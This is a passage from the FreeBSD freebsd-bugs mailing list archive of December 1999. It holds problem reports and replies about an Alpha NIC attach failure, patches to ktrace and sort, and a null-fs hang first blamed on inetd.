X-Send-Pr-Version: 3.2 Subject: kern/15455: Intel EtherExpress Pro does not properly attach on the Alpha Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15455 >Category: kern >Synopsis: Intel EtherExpress Pro does not properly attach on the Alpha >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 23:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: David O'Brien >Release: FreeBSD 4.0-CURRENT alpha >Organization: The FreeBSD Project >Environment: AlphaStation 200 4/233 Entering kernel at 0xfffffc00003252a0... FreeBSD 4.0-CURRENT #9: Sun Dec 12 16:47:24 PST 1999 AlphaStation 200/400 ("Avanti") AlphaStation 200 4/233, 233MHz 8192 byte page size, 1 processor. CPU: EV45 (21064A) major=6 minor=2 OSF PAL rev: 0x100000002012e real memory = 98615296 (96304K bytes) Physical memory chunk(s): 0x005d0000 - 0x05ffbfff, 94552064 bytes (11542 pages) avail memory = 91324416 (89184K bytes) Preloaded elf kernel "kernel" at 0xfffffc00005b4000. found-> vendor=0x1000, dev=0x0001, revid=0x02 class=01-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 intpin=a, irq=11 map[10]: type 1, range 32, base 00010000, size 8 map[14]: type 1, range 32, base 82240000, size 8 found-> vendor=0x8086, dev=0x0484, revid=0x43 class=00-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 found-> vendor=0x1011, dev=0x0002, revid=0x24 class=02-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 intpin=a, irq=5 map[10]: type 1, range 32, base 00010100, size 7 map[14]: type 1, range 32, base 82240100, size 7 found-> vendor=0x8086, dev=0x1229, revid=0x05 class=02-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 intpin=a, irq=9 map[10]: type 1, range 32, base 90000000, size 12 map[14]: type 1, range 32, base 00010180, size 5 map[18]: type 1, range 32, base 82100000, size 20 found-> vendor=0x1011, dev=0x0004, revid=0x03 class=03-80-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 intpin=a, irq=10 map[10]: type 1, range 32, base 88000000, size 27 pci0: on pcib0 ncr0: irq 11 at device 6.0 on pci0 BIOS values: SCNTL3:00 DMODE:00 DCNTL:01 CTEST3:00 CTEST4:00 CTEST5:00 ncr0: minsync=25, maxsync=206, maxoffs=8, 16 dwords burst, normal dma fifo ncr0: single-ended, open drain IRQ driver ncr0: interrupting at ISA irq 11 isab0: at device 7.0 on pci0 Bus Modes: Bus Park, Resource Lock, IDE controller: Secondary (170h-177h,376h,377h) Floppy controller: 370h,371h Floppy controller: 372h-377h Keyboard controller: 60h,62h,64h,66h RTC: 70h-77h Configuration RAM: 0C00h,0800h-08FFh Port 92: enabled isa0: on isab0 de0: irq 5 at device 11.0 on pci0 de0: interrupting at ISA irq 5 de0: DEC 21040 [10Mb/s] pass 2.4 de0: address 00:00:f8:23:5d:51 bpf: de0 attached fxp0: irq 9 at device 12.0 on pci0 fxp0: interrupting at ISA irq 9 fxp0: Ethernet address ff:ff:ff:ff:ff:ff, 10Mbps bpf: fxp0 attached pci0: unknown card (vendor=0x1011, dev=0x0004) at 13.0 irq 10 Trying Read_Port at 203 Trying Read_Port at 243 Trying Read_Port at 283 Trying Read_Port at 2c3 Trying Read_Port at 303 Trying Read_Port at 343 Trying Read_Port at 383 Trying Read_Port at 3c3 isa_probe_children: disabling PnP devices isa_probe_children: probing non-PnP devices mcclock0: at port 0x70-0x71 on isa0 Calibrating clock(s) ... PCC clock: 233315516 Hz (firmware 233100233 Hz) sio0: irq maps: 0x21 0x31 0x21 0x21 sio0 at port 0x3f8-0x3ff irq 4 on isa0 sio0: type 16550A, console sio0: interrupting at ISA irq 4 sio1: reserved for low-level i/o fdc0: interrupting at ISA irq 6 fdc0: at port 0x3f0-0x3f7 irq 6 drq 2 on isa0 fdc0: FIFO enabled, 8 bytes threshold fd0: <1440-KB 3.5" drive> on fdc0 drive 0 atkbdc0: at port 0x60-0x6f on isa0 kbdc: DIAGNOSE status:0055 kbdc: TEST_KBD_PORT status:0000 kbdc: DIAGNOSE status:0055 kbdc: TEST_KBD_PORT status:0000 atkbd0: irq 1 on atkbdc0 kbdc: DIAGNOSE status:0055 kbdc: TEST_KBD_PORT status:0000 kbdc: DIAGNOSE status:0055 kbdc: TEST_KBD_PORT status:0000 kbdc: DIAGNOSE status:0055 kbdc: TEST_KBD_PORT status:0000 kbdc: DIAGNOSE status:0055 kbdc: TEST_KBD_PORT status:0000 kbd0: atkbd0, generic (0), config:0x0, flags:0x1f0000, port:0x60-0x6f atkbd0: interrupting at ISA irq 1 psm0: current command byte:0060 kbdc: TEST_AUX_PORT status:0000 kbdc: RESET_AUX return code:00fe kbdc: RESET_AUX return code:00fe kbdc: RESET_AUX return code:00fe kbdc: DIAGNOSE status:0055 kbdc: TEST_KBD_PORT status:0000 psm0: failed to reset the aux device. sc0: no video adapter is found. isa_probe_children: probing PnP devices struct nfssvc_sock bloated (> 256bytes) Try reducing NFS_UIDHASHSIZ struct nfsuid bloated (> 128bytes) Try unionizing the nu_nickname and nu_flag fields Timecounter "alpha" frequency 233315516 Hz bpf: sl0 attached bpf: ppp0 attached bpf: lo0 attached >Description: The Ethernet address on a EtherExpress Pro/100B (i82558-based) is not properly determined. The machine also looks solid when the card is ifconfig'ed. >How-To-Repeat: # ifconfig -a de0: flags=8843 mtu 1500 inet 169.237.7.192 netmask 0xffffff00 broadcast 169.237.7.255 ether 00:00:f8:23:5d:51 media: autoselect (10baseT/UTP) status: active supported media: autoselect 10base5/AUI manual 10baseT/UTP 10baseT/UTP fxp0: flags=8802 mtu 1500 ether ff:ff:ff:ff:ff:ff media: manual supported media: manual sl0: flags=c010 mtu 552 ppp0: flags=8010 mtu 1500 lo0: flags=8049 mtu 16384 inet 127.0.0.1 netmask 0xff000000 kongur(r):/home/rootk> ifconfig fxp0 inet 192.168.100.1 [ BOX HANGS SOLID ] >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 2:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 439481514A for ; Mon, 13 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA04166; Mon, 13 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from bulls.mei.co.jp (bulls.mei.co.jp [202.224.189.102]) by hub.freebsd.org (Postfix) with ESMTP id 848BB14FF7 for ; Mon, 13 Dec 1999 02:03:20 -0800 (PST) (envelope-from takamune@mariners.mei.co.jp) Received: by bulls.mei.co.jp (8.9.3/3.7W) with ESMTP id TAA23752 for ; Mon, 13 Dec 1999 19:03:14 +0900 (JST) Received: by mariners.mei.co.jp (8.9.1/3.7W) with ESMTP id TAA14040 for ; Mon, 13 Dec 1999 19:03:09 +0900 (JST) Received: by dream.vrl.mei.co.jp (8.9.3/3.7W-11/29/99) id TAA01365; Mon, 13 Dec 1999 19:03:27 +0900 (JST) Message-Id: <199912131003.TAA01365@dream.vrl.mei.co.jp> Date: Mon, 13 Dec 1999 19:03:27 +0900 (JST) From: takamune@avrl.mei.co.jp Reply-To: takamune@avrl.mei.co.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15456: Usage of ktrace(1) is invalid Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15456 >Category: bin >Synopsis: Usage of ktrace(1) is invalid >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 02:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Kazu TAKAMUNE >Release: FreeBSD 3.4-RC i386 >Organization: Matsushita Electric Industrial Co., Ltd. >Environment: FreeBSD 3.4-RC(Mon Dec 13 13:26:38 JST 1999) (4.0-CURRENT has the same problem) >Description: Usage of ktrace(1) is not equivalent to its manual page. >How-To-Repeat: % ktrace usage: ktrace [-aCcid] [-f trfile] [-g pgid] [-p pid] [-t [cnisuv] ktrace [-aCcid] [-f trfile] [-t [cnisuw] command % man 1 ktrace SYNOPSIS ktrace [-aCcdi] [-f trfile] [-g pgrp] [-p pid] [-t trstr] ktrace [-adi] [-f trfile] [-t trstr] command >Fix: --- src/usr.bin/ktrace/ktrace.c.orig Mon Aug 30 00:29:12 1999 +++ src/usr.bin/ktrace/ktrace.c Mon Dec 13 19:00:00 1999 @@ -188,8 +188,8 @@ usage() { (void)fprintf(stderr, "%s\n%s\n", -"usage: ktrace [-aCcid] [-f trfile] [-g pgid] [-p pid] [-t [cnisuv]", -" ktrace [-aCcid] [-f trfile] [-t [cnisuw] command"); +"usage: ktrace [-aCcid] [-f trfile] [-g pgid] [-p pid] [-t trstr]", +" ktrace [-adi] [-f trfile] [-t trstr] command"); exit(1); } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 3:53: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 266C3150A3; Mon, 13 Dec 1999 03:53:07 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA10588; Mon, 13 Dec 1999 03:53:06 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 13 Dec 1999 03:53:06 -0800 (PST) From: Message-Id: <199912131153.DAA10588@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, markm@FreeBSD.org Subject: Re: bin/15370: bug in sort Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: bug in sort Responsible-Changed-From-To: freebsd-bugs->markm Responsible-Changed-By: sheldonh Responsible-Changed-When: Mon Dec 13 03:52:01 PST 1999 Responsible-Changed-Why: Mark will be interested in the patch. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 3:55: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 93E6414E3A; Mon, 13 Dec 1999 03:54:59 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA10757; Mon, 13 Dec 1999 03:54:59 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 13 Dec 1999 03:54:59 -0800 (PST) From: Message-Id: <199912131154.DAA10757@freefall.freebsd.org> To: dave@syix.com, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15405: Ports Don't Upgrade Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Ports Don't Upgrade State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Mon Dec 13 03:53:40 PST 1999 State-Changed-Why: Use pkg_delete to remove packages installed via the ports system. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 4:30: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B779914F4D for ; Mon, 13 Dec 1999 04:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA16451; Mon, 13 Dec 1999 04:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CABC414D50; Mon, 13 Dec 1999 04:26:26 -0800 (PST) Message-Id: <19991213122626.CABC414D50@hub.freebsd.org> Date: Mon, 13 Dec 1999 04:26:26 -0800 (PST) From: emmanuel.dupont@alcatel.fr To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15457: inetd makes FreeBSD crash Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15457 >Category: misc >Synopsis: inetd makes FreeBSD crash >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 04:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: emmanuel dupont >Release: FreeBSD 3.3-RELEASE #4 >Organization: Alcanet International >Environment: FreeBSD jerry 3.3-RELEASE FreeBSD 3.3-RELEASE #4: Wed Dec 1 10:26:47 CET 1999 root@jerry:/usr/src/sys/compile/JERRY i386 >Description: I was testing scripts with inetd. It crash the pc. >How-To-Repeat: echo prox 3128/tcp >>/etc/services echo prox stream tcp nowait/3 root /tmp/prox.sh prox.sh >> /etc/inetd.conf cat >/tmp/prox.sh <> "/tmp/prox.log"}' EOF chmod 550 /tmp/prox.sh kill -HUP `cat /var/run/inetd.pid` telnet localhost prox >Fix: sorry i can't >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 5:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B39414FB8 for ; Mon, 13 Dec 1999 05:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA19710; Mon, 13 Dec 1999 05:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from boco.fee.vutbr.cz (boco.fee.vutbr.cz [147.229.9.11]) by hub.freebsd.org (Postfix) with ESMTP id 0D31B15324 for ; Mon, 13 Dec 1999 05:01:07 -0800 (PST) (envelope-from cejkar@dcse.fee.vutbr.cz) Received: from kazi.dcse.fee.vutbr.cz (kazi.dcse.fee.vutbr.cz [147.229.8.12]) by boco.fee.vutbr.cz (8.9.3/8.9.3) with ESMTP id OAA40445 for ; Mon, 13 Dec 1999 14:01:03 +0100 (CET) Received: (from cejkar@localhost) by kazi.dcse.fee.vutbr.cz (8.9.3/8.9.3) id OAA28722; Mon, 13 Dec 1999 14:01:02 +0100 (CET) Message-Id: <199912131301.OAA28722@kazi.dcse.fee.vutbr.cz> Date: Mon, 13 Dec 1999 14:01:02 +0100 (CET) From: cejkar@dcse.fee.vutbr.cz Reply-To: cejkar@dcse.fee.vutbr.cz To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15458: sort(1) doesn't sort correctly in some cases Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15458 >Category: bin >Synopsis: sort(1) doesn't sort correctly in some cases >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 05:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Rudolf Cejka >Release: FreeBSD 4.0-CURRENT i386 >Organization: Brno University of Technology, FEE&CS, Czech Republic >Environment: Maybe it is not relevant, but it is 4.0-CURRENT, Dec 10 1999. >Description: Sort(1) doesn't work in some cases for some locales. In cs_CZ.ISO_8859-2 (will be shortly commited; maybe similar problem could be seen with es_ES) there is collation definition: (H,h);\ (CH,Ch,ch);\ (I,i);\ So sort should sort "h" and "ch" in order "h", "ch". But it sorts these two words incorrectly as "ch", "h". If I want to sort for example "ha" and "ch", it will be sorted correctly: "ha", "ch". The problem is in "optimalizations", where only substrings of two strings of minimal length of one of them are compared in strcoll() function. This is not possible to do in this manner for languages, where collating symbols could be longer than one character. >How-To-Repeat: >Fix: Here is my patch for /usr/src/gnu/usr.bin/sort/sort.c: --- sort.c.orig Mon Dec 13 13:21:26 1999 +++ sort.c Mon Dec 13 13:25:33 1999 @@ -208,6 +208,7 @@ return strcoll(s[0], s[1]); } +#if 0 static int collcmp(char *a, char *b, int mini) { @@ -223,6 +224,7 @@ b[mini] = sb; return r; } +#endif #endif /* __FreeBSD__ */ static void @@ -1153,7 +1155,7 @@ } else #ifdef __FreeBSD__ - diff = collcmp (texta, textb, min (lena, lenb)); + diff = strcoll (texta, textb); #else diff = memcmp (texta, textb, min (lena, lenb)); #endif @@ -1203,7 +1205,7 @@ { #endif #ifdef __FreeBSD__ - diff = collcmp (ap, bp, mini); + diff = strcoll (ap, bp); #else diff = memcmp (ap, bp, mini); #endif >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 6: 0: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1198914D7C for ; Mon, 13 Dec 1999 06:00:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA23268; Mon, 13 Dec 1999 06:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 06:00:03 -0800 (PST) Message-Id: <199912131400.GAA23268@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: misc/15457: inetd makes FreeBSD crash Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15457; it has been noted by GNATS. From: Sheldon Hearn To: emmanuel.dupont@alcatel.fr Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: misc/15457: inetd makes FreeBSD crash Date: Mon, 13 Dec 1999 15:57:07 +0200 On Mon, 13 Dec 1999 04:26:26 PST, emmanuel.dupont@alcatel.fr wrote: > I was testing scripts with inetd. It crash the pc. What does "it crash the pc" mean? Any messages in /var/log/messages? Any panic message on the console? > #!/bin/sh > /usr/bin/awk ' {print ; print >> "/tmp/prox.log"}' Okay, so you're effectively offering the same service as inetd's builtin echo service, except that you're logging what you receive to disk. Are you sure you've got enough space in /tmp? Is /tmp and MFS? If so, is its size limited, or are you giving the outside world an easy way to exhaust your swap? Also, I notice you're using 3.3-RELEASE. You should be aware that a number of problems in inetd have been fixed in 3.3-STABLE recently. None of these problems cause "crash the pc" symptoms, which I've never seen inetd do in any case. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 6:20: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 156B2150DA for ; Mon, 13 Dec 1999 06:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA25824; Mon, 13 Dec 1999 06:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 06:20:03 -0800 (PST) Message-Id: <199912131420.GAA25824@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: emmanuel dupont Subject: Re: misc/15457: inetd makes FreeBSD crash Reply-To: emmanuel dupont Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15457; it has been noted by GNATS. From: emmanuel dupont To: freebsd-gnats-submit@freebsd.org, emmanuel.dupont@alcatel.fr Cc: Subject: Re: misc/15457: inetd makes FreeBSD crash Date: Mon, 13 Dec 1999 15:10:35 +0100 I made a mistake, the problem is not inetd. It's a null-fs one. I did a "mount_null /home/tmp /tmp" ( my / was full ). I and i changed the fstab too. It worked fine (seems to) but it hang with the script "/tmp/prox.sh", inetd is not guilty. Reading the "man page" i see that null-fs was buggy so i think you can close this call. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 6:30: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 26F0B14F57 for ; Mon, 13 Dec 1999 06:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA26611; Mon, 13 Dec 1999 06:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 06:30:03 -0800 (PST) Message-Id: <199912131430.GAA26611@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Alexander Langer Subject: Re: misc/15457: inetd makes FreeBSD crash Reply-To: Alexander Langer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15457; it has been noted by GNATS. From: Alexander Langer To: emmanuel.dupont@alcatel.fr Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: misc/15457: inetd makes FreeBSD crash Date: Mon, 13 Dec 1999 14:14:08 +0100 I can't reproduce this. alex:~ $ uname -a FreeBSD cichlids.cichlids.com 4.0-CURRENT FreeBSD 4.0-CURRENT #1: Sat Dec 4 18:55:47 CET 1999 alex@cichlids.cichlids.com:/usr/src/sys/compile/cichlids i386 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 6:30:53 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cichlids.com (as15-234.rp-plus.de [149.221.237.234]) by hub.freebsd.org (Postfix) with ESMTP id DF9E4153CF for ; Mon, 13 Dec 1999 06:30:50 -0800 (PST) (envelope-from alex@cichlids.com) Received: from cichlids.cichlids.com (cichlids.cichlids.com [192.168.0.10]) by cichlids.com (Postfix) with ESMTP id 81E27AB7F; Mon, 13 Dec 1999 15:31:33 +0100 (CET) Received: (from alex@localhost) by cichlids.cichlids.com (8.9.3/8.9.3) id PAA02460; Mon, 13 Dec 1999 15:31:26 +0100 (CET) (envelope-from alex) Date: Mon, 13 Dec 1999 15:31:26 +0100 From: Alexander Langer To: emmanuel dupont Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: misc/15457: inetd makes FreeBSD crash Message-ID: <19991213153126.A2338@cichlids.cichlids.com> References: <199912131420.GAA25824@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <199912131420.GAA25824@freefall.freebsd.org>; from ed@jerry.netfr.alcatel.fr on Mon, Dec 13, 1999 at 06:20:03AM -0800 X-PGP-Fingerprint: 44 28 CA 4C 46 5B D3 A8 A8 E3 BA F3 4E 60 7D 7F X-Verwirrung: Dieser Header dient der allgemeinen Verwirrung. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thus spake emmanuel dupont (ed@jerry.netfr.alcatel.fr): > I did a "mount_null /home/tmp /tmp" ( my / was full ). That's why people prefer to have a seperate swap-partition as /tmp > It worked fine (seems to) but it hang with the script "/tmp/prox.sh", > inetd is not guilty. > Reading the "man page" i see that null-fs was buggy so i think you > can close this call. Yes, I get panics in this case, too. Alex -- I doubt, therefore I might be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 6:50: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2543315144 for ; Mon, 13 Dec 1999 06:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA82347; Mon, 13 Dec 1999 06:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 06:50:02 -0800 (PST) Message-Id: <199912131450.GAA82347@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Dennis Boone Subject: Re: bin/10553: syslogd suddenly stopped logging Reply-To: Dennis Boone Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/10553; it has been noted by GNATS. From: Dennis Boone To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: bin/10553: syslogd suddenly stopped logging Date: Mon, 13 Dec 1999 09:48:40 -0500 I have one machine running 3.2-RELEASE which does this same thing. It has happened on several occasions. The machine in question only logs for itself. I notice that "logfile turned over" messages continue to appear when syslog is in this state. Dennis Boone Metro Net Library Consortium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 6:56:35 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from caspian.plutotech.com (caspian.plutotech.com [206.168.67.80]) by hub.freebsd.org (Postfix) with ESMTP id E33F01510E for ; Mon, 13 Dec 1999 06:56:26 -0800 (PST) (envelope-from gibbs@caspian.plutotech.com) Received: from caspian.plutotech.com (localhost [127.0.0.1]) by caspian.plutotech.com (8.9.3/8.9.1) with ESMTP id HAA00378; Mon, 13 Dec 1999 07:56:25 -0700 (MST) (envelope-from gibbs@caspian.plutotech.com) Message-Id: <199912131456.HAA00378@caspian.plutotech.com> X-Mailer: exmh version 2.1.0 09/18/1999 To: "Kenneth D. Merry" Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing In-reply-to: Your message of "Sun, 12 Dec 1999 20:30:02 PST." <199912130430.UAA75208@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 13 Dec 1999 07:56:25 -0700 From: "Justin T. Gibbs" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > There are several ways to enable or disable tagged queueing: We also don't know what kind of controller is being used. The controller may also enable or disable tagged queuing and/or disconnection globally which would have the same effect. -- Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 7:43:28 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2793B14EF5; Mon, 13 Dec 1999 07:43:27 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA90522; Mon, 13 Dec 1999 07:43:27 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 13 Dec 1999 07:43:27 -0800 (PST) From: Message-Id: <199912131543.HAA90522@freefall.freebsd.org> To: emmanuel.dupont@alcatel.fr, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15457: inetd makes FreeBSD crash Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: inetd makes FreeBSD crash State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Mon Dec 13 07:38:06 PST 1999 State-Changed-Why: Misdiagnosed problem. Thanks for the quick follow-up, btw. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 8:40: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 725AB150DD for ; Mon, 13 Dec 1999 08:40:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA96806; Mon, 13 Dec 1999 08:40:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 08:40:07 -0800 (PST) Message-Id: <199912131640.IAA96806@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Mitja Horvat Subject: Re: kern/15420: 3.3-RELEASE Kernel freeze Reply-To: Mitja Horvat Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15420; it has been noted by GNATS. From: Mitja Horvat To: freebsd-gnats-submit@freebsd.org, mitja@ksop-cscp.si Cc: Subject: Re: kern/15420: 3.3-RELEASE Kernel freeze Date: Mon, 13 Dec 1999 18:36:32 +0100 After rerunning the tests with more processes (10+) I noticed that random kernel freezes were still happening. After digging a bit around the swapper code I came up with a third patch. My machine with 